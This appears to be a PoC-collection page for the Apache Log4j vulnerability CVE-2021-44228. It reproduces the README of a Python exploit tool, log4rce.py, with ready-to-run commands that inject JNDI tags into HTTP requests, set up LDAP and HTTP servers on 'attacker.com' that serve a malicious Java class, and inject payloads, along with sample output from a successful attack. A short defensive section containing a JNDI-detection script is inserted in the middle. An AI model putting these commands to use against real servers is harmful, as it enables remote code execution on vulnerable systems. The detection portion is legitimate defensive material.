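PoC details: 54df8018fe97230bed42fa7066c778d8b1512620

Source
Related vulnerability
Title: Apache Log4j code issue vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation (US). Apache Log4j has a code issue vulnerability: an attacker can craft a request and send it to a server that uses Apache Log4j, and remote code execution is triggered when that request is written to the log.
Description
An All-In-One Pure Python PoC for CVE-2021-44228
Introduction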
# Python Log4RCE

An all-in-one pure Python3 PoC for [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228).

## Sample

```bash
python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
```

```
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!
```

## Usage

This is a CLI tool. All options can be found in the help menu:

```bash
python3 log4rce.py --help
```

The list is extensive, so the following sections summarize the functionality.

### Attack Modes

The tool allows you to use a few attack modes. These attacks are extensions of the `Log4RCE` class.

#### HTTP

You can perform an automated HTTP request attack on a target URL.

You can perform a GET request as follows:

```bash
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"
```

You can perform a POST request as follows:

```bash
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"
```

In both requests, the JNDI tag is injected at the `###` placeholder.
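From the defender's side, requests like the two above can be recognised by the JNDI lookup they carry in a parameter, body field or header. The following is an added example, not part of the tool or its README: it normalises URL-encoding and flags the `${jndi:<protocol>:` prefix in request fields. The sample requests, the field names and the helper names `decode_layers`, `find_jndi` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Start of a Log4j JNDI lookup, e.g. ${jndi:ldap://host/a}; captures the protocol.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)\s*:", re.IGNORECASE)


def decode_layers(value, max_rounds=3):
    """URL-decode repeatedly (bounded) so singly and doubly encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi(fields):
    """Return [(field_name, protocol)] for each request field carrying a JNDI lookup."""
    hits = []
    for name, raw in fields.items():
        match = JNDI_RE.search(decode_layers(raw))
        if match:
            hits.append((name, match.group(1).lower()))
    return hits


# Constructed sample requests (192.0.2.10 is a documentation address).
SAMPLES = [
    {"url": "/?vuln_param=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%3A1387%2Fa%7D&param=123", "P1": "123"},
    {"url": "/", "body": "address=${JNDI:ldap://192.0.2.10:1387/a}"},
    {"url": "/search?q=jndi+tutorial", "User-Agent": "curl/8.0"},  # benign: the word alone
    {"url": "/", "X-Api-Version": "%2524%257Bjndi%253Armi%253A%252F%252F192.0.2.10%252Fa%257D"},
]


def scan(samples):
    """Run find_jndi over a list of requests, one result list per request."""
    return [find_jndi(sample) for sample in samples]


if __name__ == "__main__":
    for index, hits in enumerate(scan(SAMPLES)):
        print(index, hits or "clean")
```

A hit is a reason to check the host's outbound connections as well, since the sample output above shows the target querying the LDAP port and then fetching a `.class` file over HTTP.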

#### Manual

If you cannot use any of the previous modes, use this mode to dump the JNDI tag:

```bash
python3 log4rce.py manual
```

### Network Settings

The tool allows extensive customization of most network configuration. All the internal servers can be modified to point to different locations according to the remote settings.

#### HTTP Server

You can configure the HTTP server using the following parameters:

```bash
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
```

```
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses. 
```

#### LDAP Server

You can configure the LDAP server using the following parameters:

```bash
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
```

```
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses. 
```

### Customization

The tool supports some customization. The following lists some functionality you may be interested in.

#### Injecting Payload

You can inject a payload into the Java class using:

```bash
python3 log4rce.py --payload "PAYLOAD"
```

The payload will be injected into `"###"` strings.

#### Custom Java Payload

You can build your own Java class using the following. 

```bash
javac -source 1.7 -target 1.7 /path/to/Exploit.java
```

The resulting `.class` can be run using:

```bash
python3 log4rce.py --java_class "/path/to/Exploit.class" ...
```

Note: You can add a string `"###"` to allow payload injection.
File snapshot

```
[4.0K] /data/pocs/54df8018fe97230bed42fa7066c778d8b1512620
├── [4.0K] java
│   ├── [ 139] Exploit.java
│   └── [ 173] LinuxExploit.java
├── [1.0K] LICENSE
├── [ 14K] log4rce.py
└── [3.0K] README.md

1 directory, 5 files
```